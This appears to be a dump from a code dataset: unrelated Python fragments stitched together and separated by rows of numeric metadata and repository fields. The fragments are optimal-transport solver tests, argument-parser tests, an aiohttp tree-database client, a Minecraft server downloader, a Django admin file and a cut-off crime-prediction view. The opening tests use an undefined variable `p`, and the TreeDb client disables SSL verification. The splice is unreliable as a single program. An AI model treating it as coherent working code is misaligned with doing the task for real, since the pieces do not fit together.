assert np.allclose(np.sum(A), np.sum(B), atol=1e-10)
@pytest.mark.parametrize('seed,rho,rho2,mass', [(a, b, c, d)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]])
def test_rescale_potential_increase_score(seed, rho, rho2, mass):
n = int(15)
m = int(16)
np.random.seed(seed)
    normalize = lambda arr: arr / np.sum(arr)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
f = np.random.normal(size=a.shape[0])
g = np.random.normal(size=b.shape[0])
score1 = dual_loss(f, g, a, b, rho, rho2=rho2)
transl = rescale_potentials(f, g, a, b, rho, rho2)
score2 = dual_loss(f + transl, g - transl, a, b, rho, rho2=rho2)
assert score1 <= score2 + 1e-16
@pytest.mark.parametrize('seed,boo', [(a, b) for a in [1, 2, 3, 4, 5, 6, 7]
for b in [True, False]])
def test_lazy_pot_is_feasible(seed, boo):
n = int(15)
m = int(16)
np.random.seed(seed)
x = np.sort(np.random.uniform(size=n))
y = np.sort(np.random.uniform(size=m))
f, g = lazy_potential(x, y, p, diagonal=boo)
T = np.abs(x[:, None] - y[None, :]) ** p + 1e-15 > (
f[:, None] + g[None, :])
assert np.all(T)
@pytest.mark.parametrize('seed,rho,rho2,mass', [(a, b, c, d)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]])
def test_init_greed_is_feasible(seed, rho, rho2, mass):
n = int(15)
m = int(16)
np.random.seed(seed)
    normalize = lambda arr: arr / np.sum(arr)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
x = np.sort(np.random.uniform(size=n))
y = np.sort(np.random.uniform(size=m))
ft, gt = init_greed_uot(a, b, x, y, p, rho, rho2=rho2)
T = np.abs(x[:, None] - y[None, :]) ** p + 1e-15 > (
ft[:, None] + gt[None, :])
assert np.all(T)
@pytest.mark.parametrize('seed,rho,rho2,mass,niter,linesearch',
[(a, b, c, d, e, f)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]
for e in [1, 10, 50, 500]
for f in ['homogeneous', 'newton', 'default']])
def test_pot_fw_is_feasible(seed, rho, rho2, mass, niter, linesearch):
n = int(15)
m = int(16)
np.random.seed(seed)
    normalize = lambda arr: arr / np.sum(arr)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
x = np.sort(np.random.uniform(size=n))
y = np.sort(np.random.uniform(size=m))
    _, _, _, f, g, _ = solve_uot(a, b, x, y, p, rho, rho2=rho2, niter=niter,
                                 tol=1e-6,
                                 greed_init=True, line_search=linesearch,
                                 stable_lse=True)
    # Feasibility must hold for the potentials returned by the FW solver
    # itself, not only for the greedy initialisation (covered above).
    T = np.abs(x[:, None] - y[None, :]) ** p + 1e-15 > (
            f[:, None] + g[None, :])
    assert np.all(T)
@pytest.mark.parametrize('seed,rho,rho2,mass',
[(a, b, c, d)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]])
def test_homogeneous_linesearch_decrease(seed, rho, rho2, mass):
n = int(15)
m = int(16)
np.random.seed(seed)
    normalize = lambda arr: arr / np.sum(arr)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
x = np.sort(np.random.uniform(size=n))
y = np.sort(np.random.uniform(size=m))
_, _, _, fb, gb, _ = solve_ot(a / np.sum(a), b / np.sum(b), x, y, p)
fc, gc = lazy_potential(x, y, p)
t = homogeneous_line_search(fb, gb, fc - fb, gc - gb, a, b, rho, rho2,
nits=3)
ft, gt = fb + t * (fc - fb), gb + t * (gc - gb)
s0 = invariant_dual_loss(fb, gb, a, b, rho, rho2)
s1 = invariant_dual_loss(fc, gc, a, b, rho, rho2)
st = invariant_dual_loss(ft, gt, a, b, rho, rho2)
assert st >= s0 + t * (s1 - s0)
@pytest.mark.parametrize('seed,rho,rho2,mass',
[(a, b, c, d)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]])
def test_newton_linesearch_decrease(seed, rho, rho2, mass):
n = int(15)
m = int(16)
np.random.seed(seed)
    normalize = lambda arr: arr / np.sum(arr)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
x = np.sort(np.random.uniform(size=n))
y = np.sort(np.random.uniform(size=m))
_, _, _, fb, gb, _ = solve_ot(a / np.sum(a), b / np.sum(b), x, y, p)
fc, gc = lazy_potential(x, y, p)
t = newton_line_search(fb, gb, fc - fb, gc - gb, a, b, rho, rho2,
nits=3)
ft, gt = fb + t * (fc - fb), gb + t * (gc - gb)
s0 = invariant_dual_loss(fb, gb, a, b, rho, rho2)
s1 = invariant_dual_loss(fc, gc, a, b, rho, rho2)
st = invariant_dual_loss(ft, gt, a, b, rho, rho2)
assert st >= s0 + t * (s1 - s0)
# TODO: FW yields same answer for all line search
| 41.410714 | 78 | 0.482679 | 1,107 | 6,957 | 2.957543 | 0.101174 | 0.080635 | 0.100794 | 0.127673 | 0.808491 | 0.798412 | 0.774893 | 0.774893 | 0.774893 | 0.74832 | 0 | 0.059441 | 0.356763 | 6,957 | 167 | 79 | 41.658683 | 0.672179 | 0.006756 | 0 | 0.78 | 0 | 0 | 0.022727 | 0.005067 | 0 | 0 | 0 | 0.005988 | 0.046667 | 1 | 0.046667 | false | 0 | 0.02 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cf74331c1b40bd484c9516716a91125caca00be1 | 4,056 | py | Python | tests/commands/args/test_number.py | talismud/talismud | 366d75c30e51a43fbcd2676bf8b977f2745d3741 | [
"BSD-3-Clause"
] | null | null | null | tests/commands/args/test_number.py | talismud/talismud | 366d75c30e51a43fbcd2676bf8b977f2745d3741 | [
"BSD-3-Clause"
] | null | null | null | tests/commands/args/test_number.py | talismud/talismud | 366d75c30e51a43fbcd2676bf8b977f2745d3741 | [
"BSD-3-Clause"
] | null | null | null | from command.args import CommandArgs
def test_one_correct_number():
"""Test to parse a command with one number."""
args = CommandArgs()
args.add_argument("number")
result = args.parse(None, "52")
assert bool(result)
assert result.number == 52
def test_one_incorrect_number():
"""Test to parse a command with one number."""
args = CommandArgs()
args.add_argument("number")
result = args.parse(None, "not a number")
assert not bool(result)
def test_one_invalid_number():
"""Test to parse a command with one number."""
args = CommandArgs()
args.add_argument("number")
result = args.parse(None, "-3")
assert not bool(result)
def test_one_min_limited_correct_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.min_limit = -5
result = args.parse(None, "-3")
assert bool(result)
assert result.number == -3
def test_one_min_limited_incorrect_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.min_limit = -5
result = args.parse(None, "-6")
assert not bool(result)
def test_one_no_min_limit_correct_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.min_limit = None
result = args.parse(None, "-120")
assert bool(result)
assert result.number == -120
def test_one_max_limited_correct_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.max_limit = 5
result = args.parse(None, "4")
assert bool(result)
assert result.number == 4
def test_one_max_limited_incorrect_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.max_limit = 5
result = args.parse(None, "6")
assert not bool(result)
def test_one_no_max_limit_correct_number():
    """Parse a number with no maximum limit."""
args = CommandArgs()
number = args.add_argument("number")
number.max_limit = None
result = args.parse(None, "120")
assert bool(result)
assert result.number == 120
def test_two_mandatory_numbers_valid():
"""Parse a command with two numbers separated by space."""
args = CommandArgs()
args.add_argument("number", dest="first")
args.add_argument("number", dest="second")
result = args.parse(None, "5 2")
assert bool(result)
assert result.first == 5
assert result.second == 2
def test_two_mandatory_numbers_error():
"""Parse a command with one number, but expect two."""
# Parse one number but expect two.
args = CommandArgs()
args.add_argument("number", dest="first")
args.add_argument("number", dest="second")
result = args.parse(None, "5")
assert not bool(result)
# Parse three numbers but expect two.
result = args.parse(None, "1 2 3")
assert not bool(result)
def test_two_mandatory_numbers_separated_by_symbol_valid():
"""Parse a command with two numbers separated by a symbol."""
args = CommandArgs()
args.add_argument("number", dest="first")
args.add_argument("symbols", "|")
args.add_argument("number", dest="second")
result = args.parse(None, "5|2")
assert bool(result)
assert result.first == 5
assert result.second == 2
# Put spaces before/after the separator.
result = args.parse(None, "5 | 2")
assert bool(result)
assert result.first == 5
assert result.second == 2
def test_two_mandatory_numbers_separated_by_symbols_error():
"""Parse a command with one number, but expect two."""
# Parse one number but expect two.
args = CommandArgs()
args.add_argument("number", dest="first")
args.add_argument("symbols", "|")
args.add_argument("number", dest="second")
result = args.parse(None, "5")
assert not bool(result)
# Parse three numbers but expect two.
result = args.parse(None, "1|2|3")
assert not bool(result)
| 28.363636 | 65 | 0.666667 | 546 | 4,056 | 4.791209 | 0.106227 | 0.050841 | 0.108945 | 0.136468 | 0.943043 | 0.922401 | 0.883028 | 0.842125 | 0.842125 | 0.809251 | 0 | 0.014556 | 0.203895 | 4,056 | 142 | 66 | 28.56338 | 0.795602 | 0.160503 | 0 | 0.715789 | 0 | 0 | 0.064168 | 0 | 0 | 0 | 0 | 0 | 0.284211 | 1 | 0.136842 | false | 0 | 0.010526 | 0 | 0.147368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d854565a6717e3beae4a41442d6efc9ffac8247f | 10,116 | py | Python | youwol_utils/clients/treedb/treedb.py | youwol/py-youwol | 85a8877e302c9da1aea168bf1d964d19036c1134 | [
"MIT"
] | null | null | null | youwol_utils/clients/treedb/treedb.py | youwol/py-youwol | 85a8877e302c9da1aea168bf1d964d19036c1134 | [
"MIT"
] | 1 | 2022-03-14T09:40:15.000Z | 2022-03-14T09:40:15.000Z | youwol_utils/clients/treedb/treedb.py | youwol/py-youwol | 85a8877e302c9da1aea168bf1d964d19036c1134 | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
from typing import Dict
import aiohttp
from youwol_utils.clients.utils import raise_exception_from_response
@dataclass(frozen=True)
class TreeDbClient:
url_base: str
headers: Dict[str, str] = field(default_factory=lambda: {})
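    # NOTE: this connector is created at class-definition time and is not
    # passed to the per-request ClientSession instances below; `verify_ssl`
    # is also deprecated in recent aiohttp in favour of `ssl=False`.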
connector = aiohttp.TCPConnector(verify_ssl=False)
async def get_drives(self, group_id: str, **kwargs):
url = f"{self.url_base}/groups/{group_id}/drives"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
drives = await resp.json()
return drives
await raise_exception_from_response(resp, **kwargs)
async def get_drive(self, drive_id: str, **kwargs):
url = f"{self.url_base}/drives/{drive_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
drives = await resp.json()
return drives
await raise_exception_from_response(resp, **kwargs)
async def create_drive(self, group_id: str, body, **kwargs):
url = f"{self.url_base}/groups/{group_id}/drives"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.put(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
drives = await resp.json()
return drives
await raise_exception_from_response(resp, **kwargs)
async def update_drive(self, drive_id: str, body, **kwargs):
url = f"{self.url_base}/drives/{drive_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
drives = await resp.json()
return drives
await raise_exception_from_response(resp, **kwargs)
async def delete_drive(self, drive_id: str, **kwargs):
url = f"{self.url_base}/drives/{drive_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.delete(url=url, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def create_folder(self, parent_folder_id: str, body, **kwargs):
url = f"{self.url_base}/folders/{parent_folder_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.put(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
folder = await resp.json()
return folder
await raise_exception_from_response(resp, **kwargs)
async def update_folder(self, folder_id: str, body, **kwargs):
url = f"{self.url_base}/folders/{folder_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
folder = await resp.json()
return folder
await raise_exception_from_response(resp, **kwargs)
async def move(self, body, **kwargs):
url = f"{self.url_base}/move"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
folder = await resp.json()
return folder
await raise_exception_from_response(resp, **kwargs)
async def remove_folder(self, folder_id: str, **kwargs):
url = f"{self.url_base}/folders/{folder_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.delete(url=url, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def remove_item(self, item_id: str, **kwargs):
url = f"{self.url_base}/items/{item_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.delete(url=url, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def get_item(self, item_id: str, **kwargs):
url = f"{self.url_base}/items/{item_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_path(self, item_id, **kwargs):
url = f"{self.url_base}/items/{item_id}/path"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_entity(self, entity_id: str, include_drives: bool = True, include_folders: bool = True,
include_items: bool = True, **kwargs):
url = f"{self.url_base}/entities/{entity_id}"
params = {"include-drives": int(include_drives),
"include-folders": int(include_folders),
"include-items": int(include_items)}
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, params=params, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_items_from_related_id(self, related_id: str, **kwargs):
url = f"{self.url_base}/items/from-related/{related_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def update_item(self, item_id: str, body, **kwargs):
url = f"{self.url_base}/items/{item_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_folder(self, folder_id: str, **kwargs):
url = f"{self.url_base}/folders/{folder_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_children(self, folder_id: str, **kwargs):
url = f"{self.url_base}/folders/{folder_id}/children"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_deleted(self, drive_id: str, **kwargs):
url = f"{self.url_base}/drives/{drive_id}/deleted"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def purge_drive(self, drive_id: str, **kwargs):
url = f"{self.url_base}/drives/{drive_id}/purge"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.delete(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def create_item(self, folder_id: str, body, **kwargs):
url = f"{self.url_base}/folders/{folder_id}/items"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.put(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
folder = await resp.json()
return folder
await raise_exception_from_response(resp, **kwargs)
async def get_records(self, body, **kwargs):
url = f"{self.url_base}/records"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
folder = await resp.json()
return folder
await raise_exception_from_response(resp, **kwargs)
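
# Minimal usage sketch (assumptions: a tree-db service is reachable at
# `url_base` and the token is valid; neither is part of the class above):
#   client = TreeDbClient(url_base="http://host/api/treedb",
#                         headers={"Authorization": "Bearer <token>"})
#   drives = await client.get_drives(group_id="my-group")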
| 40.464 | 105 | 0.59134 | 1,212 | 10,116 | 4.80363 | 0.063531 | 0.064926 | 0.068018 | 0.098248 | 0.887324 | 0.881828 | 0.878221 | 0.878221 | 0.8674 | 0.851941 | 0 | 0.00899 | 0.307236 | 10,116 | 249 | 106 | 40.626506 | 0.821775 | 0 | 0 | 0.751381 | 0 | 0 | 0.077896 | 0.071768 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022099 | 0 | 0.160221 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d86a1a647aae9fb70ee365860aac9ed32f6379a8 | 657 | py | Python | pyss/simpleobject.py | vpv11110000/pyss | bc2226e2e66e0b551a09ae6ab6835b0bb6c7f32b | [
"MIT"
] | null | null | null | pyss/simpleobject.py | vpv11110000/pyss | bc2226e2e66e0b551a09ae6ab6835b0bb6c7f32b | [
"MIT"
] | 2 | 2017-09-05T11:12:05.000Z | 2017-09-07T19:23:15.000Z | pyss/simpleobject.py | vpv11110000/pyss | bc2226e2e66e0b551a09ae6ab6835b0bb6c7f32b | [
"MIT"
] | null | null | null | # #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
A very simple object
"""
# pylint: disable=line-too-long
class SimpleObject(object):
"""Простой объект модели
Args:
value - значение
"""
def __init__(self, value=None):
self.value = value
def getValue(self):
return self.value
def setValue(self, value):
self.value = value
def addValue(self, value):
self.value = self.value + value
def decValue(self, value):
self.value = self.value - value
def __str__(self):
return "%s" % str(self.value)
if __name__ == '__main__':
pass
| 16.846154 | 39 | 0.557078 | 74 | 657 | 4.72973 | 0.486486 | 0.308571 | 0.185714 | 0.257143 | 0.274286 | 0.274286 | 0.2 | 0.2 | 0 | 0 | 0 | 0.002217 | 0.313546 | 657 | 38 | 40 | 17.289474 | 0.773836 | 0.21309 | 0 | 0.133333 | 0 | 0 | 0.020534 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.066667 | 0 | 0.133333 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
d86cc563e95712c9e3dded8c0557dec3bff1f680 | 4,928 | py | Python | versions/default.py | Advik-B/MC-Server-Installer | a52ed35eac828f220044b5a751c5f8ecf4d82f42 | [
"MIT"
] | 1 | 2021-08-15T11:23:09.000Z | 2021-08-15T11:23:09.000Z | versions/default.py | Advik-B/Server-Installer | a52ed35eac828f220044b5a751c5f8ecf4d82f42 | [
"MIT"
] | null | null | null | versions/default.py | Advik-B/Server-Installer | a52ed35eac828f220044b5a751c5f8ecf4d82f42 | [
"MIT"
] | null | null | null | import os
try:
import subprocess
import requests
from bs4 import BeautifulSoup
from zipfile import ZipFile
except ModuleNotFoundError:
    import sys
    # Install into the environment of the interpreter that is running this script.
    os.system('"%s" -m pip install -r requirements.txt' % sys.executable)
import subprocess
import requests
from bs4 import BeautifulSoup
from zipfile import ZipFile
class Server:
    """
    Helpers for downloading and running a Minecraft server.
    Forge and Fabric distributions ship as archives, so use `zip_download`
    for those.
    """
    @staticmethod
    def download(link: str, folder_path=None) -> None:
        """
        Download a plain `server.jar`; Forge and Fabric require `zip_download`.
        """
headers = {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Max-Age': '3600',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
        url = link
        # `headers` must be passed as a keyword argument; positionally it
        # would be interpreted as the `params` argument of requests.get.
        req = requests.get(url, headers=headers)
soup = BeautifulSoup(req.content, 'html.parser')
url = soup.find("a", class_="popsok").get('href')
r = requests.get(url , stream=True)
        if folder_path is not None:
            file_path = (folder_path + '/server.jar').replace('\\', '/')
else:
file_path = ('./server.jar')
print ("Server-Type : " + soup.find("div", class_="filename").get_text())
print (soup.find("ul", class_="details").get_text())
print('Downloading, please wait.')
with open(file_path,'wb') as f:
for chunk in r.iter_content(chunk_size=1000):
if chunk:
f.write(chunk)
print()
print('Download completed!')
    @staticmethod
    def runserver(server_folder=None, run_command=None, server_file_name=None) -> None:
        # Fall back to the current directory when no server folder is given.
        path = server_folder if server_folder is not None else os.getcwd()
        eula = os.path.join(path, 'eula.txt').replace('\\', '/')
        if server_file_name is None:
            server_file_name = 'server.jar'
        if run_command is None:
            run_command = 'java -Xmx1024M -Xms1024M -jar'
        # Accept the EULA so the server starts without manual intervention.
        eula_content = "#By changing the setting below to TRUE you are indicating your agreement to our EULA (https://account.mojang.com/documents/minecraft_eula).\n#Sun Aug 15 09:55:51 IST 2021\neula=true"
        with open(eula, mode='w+') as f:
            f.write(eula_content)
        subprocess.Popen(f'{run_command} {server_file_name} nogui', cwd=path)
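
    # Minimal usage sketch (assumptions: the links point at download pages this
    # scraper understands, and a Java runtime is on PATH; the URLs are illustrative):
    #   Server.download('https://example.com/vanilla', folder_path='./srv')
    #   Server.runserver(server_folder='./srv')
    #   Server.zip_download('https://example.com/forge.zip', folder_path='./srv')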
    @staticmethod
    def zip_download(link: str, folder_path=None) -> None:
        """
        Download a zipped server distribution (Forge/Fabric) and extract it.
        """
headers = {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Max-Age': '3600',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
        url = link
        req = requests.get(url, headers=headers)  # headers must be a keyword argument
soup = BeautifulSoup(req.content, 'html.parser')
url = soup.find("a", class_="popsok").get('href')
r = requests.get(url ,stream=True)
        if folder_path is not None:
            file_path = (folder_path + '/server.zip').replace('\\', '/')
else:
file_path = ('./server.zip')
print ("Server-Type : " + soup.find("div", class_="filename").get_text())
print (soup.find("ul", class_="details").get_text())
print('Downloading, please wait.')
with open(file_path,'wb') as f:
for chunk in r.iter_content(chunk_size=1000):
if chunk:
f.write(chunk)
print()
print('Download completed!')
        # ZipFile is already imported at module level; extract everything from
        # the downloaded archive (`archive` avoids shadowing the zip built-in).
        with ZipFile(file_path, 'r') as archive:
            archive.extractall(folder_path)
os.remove(file_path) | 35.710145 | 210 | 0.572443 | 591 | 4,928 | 4.646362 | 0.270728 | 0.037873 | 0.035688 | 0.02622 | 0.822287 | 0.804079 | 0.804079 | 0.804079 | 0.804079 | 0.804079 | 0 | 0.029746 | 0.30418 | 4,928 | 138 | 211 | 35.710145 | 0.77107 | 0.068385 | 0 | 0.734043 | 0 | 0.042553 | 0.277753 | 0.046625 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031915 | false | 0 | 0.106383 | 0 | 0.148936 | 0.106383 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2b5f8f360860d3bcb5cf7f77835c9a45dc803b39 | 162 | py | Python | swa/web/admin.py | swones/swa | f33d51a58841935af10409f97ba63af148e9635f | [
"MIT"
] | null | null | null | swa/web/admin.py | swones/swa | f33d51a58841935af10409f97ba63af148e9635f | [
"MIT"
] | null | null | null | swa/web/admin.py | swones/swa | f33d51a58841935af10409f97ba63af148e9635f | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Language, Snippet, Tag
admin.site.register(Tag)
admin.site.register(Snippet)
admin.site.register(Language)
| 20.25 | 42 | 0.808642 | 23 | 162 | 5.695652 | 0.478261 | 0.206107 | 0.389313 | 0.305344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092593 | 162 | 7 | 43 | 23.142857 | 0.891156 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
2b7446ebe0c69044c9d6f29292cc90ed50de756b | 87,578 | py | Python | Dashboard with Django/app/views.py | reddyprasade/Data-Analysis-with-Python- | 2440e23486856eea5556c8262467b3a618032bc2 | [
"MIT"
] | 1 | 2021-06-29T23:15:05.000Z | 2021-06-29T23:15:05.000Z | Dashboard with Django/app/views.py | reddyprasade/Data-Analysis-with-Python- | 2440e23486856eea5556c8262467b3a618032bc2 | [
"MIT"
] | null | null | null | Dashboard with Django/app/views.py | reddyprasade/Data-Analysis-with-Python- | 2440e23486856eea5556c8262467b3a618032bc2 | [
"MIT"
] | 1 | 2021-12-20T10:04:53.000Z | 2021-12-20T10:04:53.000Z | from django.shortcuts import render
from django.http import HttpResponse
from django.template import loader
from django.contrib.auth.forms import UserCreationForm
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login as auth_login
from django.shortcuts import redirect
import matplotlib
matplotlib.use('Agg')
import numpy as np
from django.views.generic import TemplateView
import pandas as pd
import os
import seaborn as sns
from app.models import crimes_against_women,murder
import plotly
import plotly.offline as opy
import plotly.graph_objs as go
import pickle
# Create your views here.
from django import forms
from django.utils import timezone
from app.forms import caw, mv, sf
def sss(request):
if request.method == "POST":
form = sf(request.POST)
if form.is_valid():
model_instance = form.save(commit=False)
model_instance.timestamp = timezone.now()
model_instance.save()
day = request.POST.get('Day')
place = request.POST.get('location')
            filename = 'prediction.sav'
            module_dir = os.path.dirname(__file__)
            file_path = os.path.join(module_dir, filename)
            # Close the file handle promptly after unpickling the model.
            with open(file_path, 'rb') as model_file:
                model = pickle.load(model_file)
p = [0] * 17
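            # One-hot encode the two categorical inputs for the pickled model:
            # indices 0-6 are the day of week (alphabetical: Friday..Wednesday),
            # indices 7-16 the SFPD district (alphabetical: BAYVIEW..TENDERLOIN).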
            days = ['Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday',
                    'Tuesday', 'Wednesday']
            districts = ['BAYVIEW', 'CENTRAL', 'INGLESIDE', 'MISSION',
                         'NORTHERN', 'PARK', 'RICHMOND', 'SOUTHERN',
                         'TARAVAL', 'TENDERLOIN']
            if day in days:
                p[days.index(day)] = 1
            if place in districts:
                p[7 + districts.index(place)] = 1
            # scikit-learn expects a 2-D array of samples, hence the wrapping list.
            array = model.predict_proba([p])
crimes = ['ARSON', 'ASSAULT', 'BAD CHECKS', 'BRIBERY', 'BURGLARY',
'DISORDERLY CONDUCT', 'DRIVING UNDER THE INFLUENCE',
'DRUG/NARCOTIC', 'DRUNKENNESS', 'EMBEZZLEMENT', 'EXTORTION',
'FAMILY OFFENSES', 'FORGERY/COUNTERFEITING', 'FRAUD', 'GAMBLING',
'KIDNAPPING', 'LARCENY/THEFT', 'LIQUOR LAWS', 'LOITERING',
'MISSING PERSON', 'NON-CRIMINAL', 'OTHER OFFENSES',
'PORNOGRAPHY/OBSCENE MAT', 'PROSTITUTION', 'RECOVERED VEHICLE',
'ROBBERY', 'RUNAWAY', 'SECONDARY CODES', 'SEX OFFENSES FORCIBLE',
'SEX OFFENSES NON FORCIBLE', 'STOLEN PROPERTY', 'SUICIDE',
'SUSPICIOUS OCC', 'TREA', 'TRESPASS', 'VANDALISM', 'VEHICLE THEFT',
'WARRANTS', 'WEAPON LAWS']
            thevalues = {
                'day': day,
                'location': place,
                'array': array,
                'crimes': crimes,
            }
            # Expose each class name and its probability (as a percentage)
